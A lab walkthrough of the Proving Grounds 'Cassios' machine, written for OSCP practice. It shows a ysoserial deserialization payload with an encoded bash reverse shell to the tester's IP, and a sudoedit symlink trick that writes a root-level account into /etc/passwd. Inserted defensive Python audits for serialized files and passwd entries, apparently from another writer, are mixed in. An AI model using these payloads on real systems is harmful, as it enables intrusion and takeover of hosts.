Proving Grounds: Cassios

Al1z4deh:~# echo "Welcome"
5 min read, Dec 15, 2022

Today we will take a look at Proving Grounds: Cassios. My purpose in sharing this post is to prepare for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- -sS --min-rate 10000 -oN nmap/quick 192.168.200.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 11:51 EST
Warning: 192.168.200.116 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.200.116
Host is up (0.10s latency).
Not shown: 62245 closed tcp ports (reset), 3285 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
  • smb (445)
└─$ smbmap -H 192.168.200.116                      
[+] IP: 192.168.200.116:445 Name: 192.168.200.116
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Samantha Konstan READ, WRITE Backups and Recycler files
IPC$ NO ACCESS IPC Service (Samba 4.10.4)
└─$ smbclient '//192.168.200.116\Samantha Konstan'
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Dec 15 11:52:50 2022
.. D 0 Thu Sep 24 13:38:10 2020
recycler.ser N 0 Wed Sep 23 21:35:15 2020
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020
  • 8080
└─# feroxbuster --url http://192.168.200.116/ -w /usr/share/wordlists/dirb/big.txt
http://192.168.200.116/backup_migrate => http://192.168.200.116/backup_migrate/
└─# tar -xvf recycler.tar

Here we find the username and password for login.

└─# cat src/main/java/com/industrial/recycler/WebSecurityConfig.java

When we click through the application's options, we see that the size of recycler.ser on the SMB share has changed.

Before

└─$ smbclient '//192.168.200.116\Samantha Konstan'
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Dec 15 11:52:50 2022
.. D 0 Thu Sep 24 13:38:10 2020
recycler.ser N 0 Wed Sep 23 21:35:15 2020
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020

After

smb: \> ls
. D 0 Thu Dec 15 11:52:50 2022
.. D 0 Thu Sep 24 13:38:10 2020
recycler.ser N 146 Thu Dec 15 11:56:14 2022
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020

If we look carefully at the code, we can see the related file. Let's download it and take a look.

smb: \> mget recycler.ser
Get file recycler.ser? y
getting file \recycler.ser of size 146 as recycler.ser (0.4 KiloBytes/sec) (average 21.4 KiloBytes/sec)
smb: \> exit

└─$ file recycler.ser
recycler.ser: Java serialization data, version 5

Let’s explore Java serialization data, version 5

I used it.
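To see what `file` is keying on, and how a defender could inspect a blob like recycler.ser before an application deserializes it, here is an added Python example (my own code, not from the post or the Cassios application). It checks for the Java serialization stream header, heuristically lists the class descriptor names the stream references, and flags any class outside a constructed allow-list. The allow-list prefix `com.industrial.recycler.` is taken from the source path shown in the post; the class names in the samples and the `build_sample` helper are constructed for this demonstration and are not the real recycler.ser.

```python
import re
import struct

# Java serialization stream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
# This is the signature `file` reports as "Java serialization data, version 5".
STREAM_HEADER = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73         # new object follows
TC_CLASSDESC = 0x72      # new class descriptor: UTF class name follows
TC_ENDBLOCKDATA = 0x78   # end of class annotations
TC_NULL = 0x70           # no superclass descriptor

# Fully qualified Java class name: identifiers joined by dots.
CLASS_NAME_RE = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$")

# Constructed allow-list: the application's own package (from the
# WebSecurityConfig.java path in the post) plus a few core JDK packages.
ALLOWED_PREFIXES = ("com.industrial.recycler.", "java.lang.", "java.util.")


def is_java_serialized(blob: bytes) -> bool:
    """True if the blob starts with the Java serialization stream header."""
    return blob.startswith(STREAM_HEADER)


def extract_class_names(blob: bytes) -> list:
    """Heuristically list the class descriptor names in a serialized stream.

    A full parser would walk the whole object graph; this scan only looks for
    the TC_CLASSDESC marker followed by a plausible length-prefixed class
    name, which is enough to see which classes the stream will instantiate.
    """
    names = []
    i = 0
    while i + 3 <= len(blob):
        if blob[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", blob[i + 1:i + 3])
            candidate = blob[i + 3:i + 3 + length]
            if 0 < length <= 255 and len(candidate) == length and CLASS_NAME_RE.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


def audit_stream(blob: bytes) -> dict:
    """Report whether a blob is a Java serialized stream and which referenced
    classes fall outside the allow-list."""
    if not is_java_serialized(blob):
        return {"serialized": False, "classes": [], "disallowed": []}
    classes = extract_class_names(blob)
    disallowed = [c for c in classes if not c.startswith(ALLOWED_PREFIXES)]
    return {"serialized": True, "classes": classes, "disallowed": disallowed}


def build_sample(class_name: str) -> bytes:
    """Construct a minimal stream holding one empty object of class_name
    (constructed test data for the demo, not a real recycler.ser)."""
    name = class_name.encode("ascii")
    return (
        STREAM_HEADER
        + bytes([TC_OBJECT, TC_CLASSDESC])
        + struct.pack(">H", len(name)) + name
        + b"\x00" * 8                            # serialVersionUID (placeholder)
        + b"\x02"                                # classDescFlags: SC_SERIALIZABLE
        + b"\x00\x00"                            # field count: 0
        + bytes([TC_ENDBLOCKDATA, TC_NULL])      # no annotations, no superclass
    )


if __name__ == "__main__":
    benign = build_sample("com.industrial.recycler.ExampleBean")      # constructed name
    suspect = build_sample("org.example.thirdparty.Transformer")      # constructed name
    print(audit_stream(benign))
    print(audit_stream(suspect))
    print(audit_stream(b"not a stream"))
```

The scan is deliberately a triage tool: it tells you that a file an application is about to deserialize now references classes the application never wrote, which is exactly the change a defender wants to notice on a share that anonymous users can write to. The durable fix belongs inside the JVM: Java 9 and later (and later Java 8 updates) provide `ObjectInputFilter` via `ObjectInputStream.setObjectInputFilter` or the `jdk.serialFilter` property, which apply the same kind of pattern allow-list before any class is instantiated, so a swapped serialized file is rejected instead of executed.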

  • RCE

Let’s prepare our payload.

└─# java -jar ysoserial-master-2874a69f61-1.jar  CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjIwMC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" > recycler.ser

We delete the original file and upload our own.

smb: \> del recycler.ser
smb: \> put recycler.ser
putting file recycler.ser as \recycler.ser (12.6 kb/s) (average 12.6 kb/s)
smb: \> ls
. D 0 Thu Dec 15 11:59:07 2022
.. D 0 Thu Sep 24 13:38:10 2020
readme.txt N 478 Thu Sep 24 13:32:50 2020
spring-mvc-quickstart-archetype D 0 Thu Sep 24 13:36:11 2020
thymeleafexamples-layouts D 0 Thu Sep 24 13:37:09 2020
resources.html N 42713 Thu Sep 24 13:37:41 2020
pom-bak.xml N 2187 Thu Oct 1 16:28:46 2020
recycler.ser A 3625 Thu Dec 15 11:59:07 2022

8374272 blocks of size 1024. 6446888 blocks available

Let's check the option again and get a shell.

script /dev/null -c bash
export TERM=xterm
Ctrl + z
stty raw -echo ; fg

Don't forget to do this.
  • Privesc (sudo)

When we check the privileges, we see that we can edit the file with sudoedit. Let’s look at the version of sudo to use it.

[samantha@cassios /]$ sudo -V
sudo -V
Sudo version 1.8.14
Sudoers policy plugin version 1.8.14
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.14

We found an exploit that matches the version.

I will use this part.

First, let's make the hash.

└─# openssl passwd -1 -salt hacker pass123
$1$hacker$zVnrpoW2JQO5YUrLmAs.o1

Now let's exploit it.

[samantha@cassios ~]$ mkdir -p /home/samantha/exploit
[samantha@cassios ~]$ ln -sf /etc/passwd /home/samantha/exploit/recycler.ser
[samantha@cassios ~]$ sudoedit /home/samantha/exploit/recycler.ser
In the editor, add the following line containing the hash:
hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash

[samantha@cassios ~]$ su hacker
Password:
[root@cassios samantha]# whoami
root

And now we are root.
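On the defender's side, the modification above leaves an obvious trace in /etc/passwd: a second uid-0 account whose hash sits directly in the password field instead of in /etc/shadow. The following added Python check (my own code, not from the post) audits a passwd file for exactly those conditions, plus malformed and empty-password entries. The sample content is constructed from the line the post adds together with a few typical entries; on a real host you would pass it the contents of /etc/passwd.

```python
# Constructed sample of /etc/passwd after the change shown in the post:
# a second uid-0 account with a hash embedded in the password field, and
# (added for the demo) an account with an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
samantha:x:1000:1000::/home/samantha:/bin/bash
hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
"""

# Password-field values that mean "look in /etc/shadow" or "locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> list:
    """Return (line number, finding kind, username) tuples for suspicious
    /etc/passwd entries:
      extra-uid0      - an account other than root with uid 0
      hash-in-passwd  - a hash stored in passwd instead of shadow
      empty-password  - an account with no password at all
      malformed       - a line that does not have the seven passwd fields
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", line))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and user != "root":
            findings.append((lineno, "extra-uid0", user))
        if pw == "":
            findings.append((lineno, "empty-password", user))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append((lineno, "hash-in-passwd", user))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> list:
    """Convenience wrapper to audit a passwd file on disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, kind, who in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {kind}: {who}")
```

The two findings on the `hacker` line are independent signals: an extra uid-0 entry is a problem even when its hash lives in /etc/shadow, and a hash in /etc/passwd is a problem even for a non-root account, because that file is world-readable. Either condition is worth an alert from a file-integrity monitor watching /etc/passwd and the sudoers rules that make such an edit possible.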

"If you have any questions or comments, please do not hesitate to write. Have a good day."
